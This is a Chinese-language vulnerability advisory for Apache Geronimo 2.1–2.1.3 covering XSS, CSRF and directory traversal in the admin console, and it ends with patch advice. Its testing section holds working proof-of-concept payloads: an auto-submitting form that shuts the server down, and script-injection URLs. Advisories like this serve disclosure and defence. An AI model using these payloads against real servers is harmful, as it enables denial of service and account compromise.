发布日期：2009-04-16
更新日期：2009-04-17

受影响系统：

Apache Group Geronimo 2.1 - 2.1.3

不受影响系统：

Apache Group Geronimo 2.1.4

描述：

---

BUGTRAQ  ID: 34562
CVE(CAN) ID: CVE-2009-0039,CVE-2009-0038,CVE-2008-5518

Apache Geronimo是Apache软件基金会的开放源码J2EE服务器。

Apache Geronimoweb管理控制台的/console/portal/Server/Monitoring脚本没有正确的验证用户请求中的name、ip、username、description等参数，远程攻击者可以通过提交恶意请求执行跨站脚本或跨站请求伪造攻击；此外/console/portal//Services/Repository脚本没有正确地验证group、artifact、version、fileType参数，/console/portal/Embedded DB/DB Manager脚本没有正确验证createDB参数，/console/portal//Security/Keystores/__pm0x3console-base0x2Keystores!824133314|0_view/__rp0x3console-base0x2Keystores!824133314|0_mode/createKeystore脚本没有正确验证filename参数，允许远程攻击者执行目录遍历攻击。

<*来源：Digital Security Research Group
  
  链接：http://marc.info/?l=bugtraq&m=123990409505601&w=2
        http://marc.info/?l=bugtraq&m=123990471106465&w=2
        http://marc.info/?l=bugtraq&m=123990509907099&w=2
        http://secunia.com/advisories/34715/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
        <form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>  <input type=hidden value='Shutdown' name="shutdown">  <input type=submit>
        </form>
</html>
<script>
        document.getElementById(1).submit();
</script>

http://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--
http://[server]/console/portal//Server/Monitoring/__ac0x3monitoring0x2monitoring!126896788|0/__pm0x3monitoring0x2monitoring!126896788|0_edit?action=saveAddView&name="><script>alert("DSecRG XSS")</script>&description=</textarea><script>alert("DSecRG XSS")</script>

建议：

---

厂商补丁：

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://geronimo.apache.org/downloads.html

浏览次数：2893
严重程度：0（网友投票）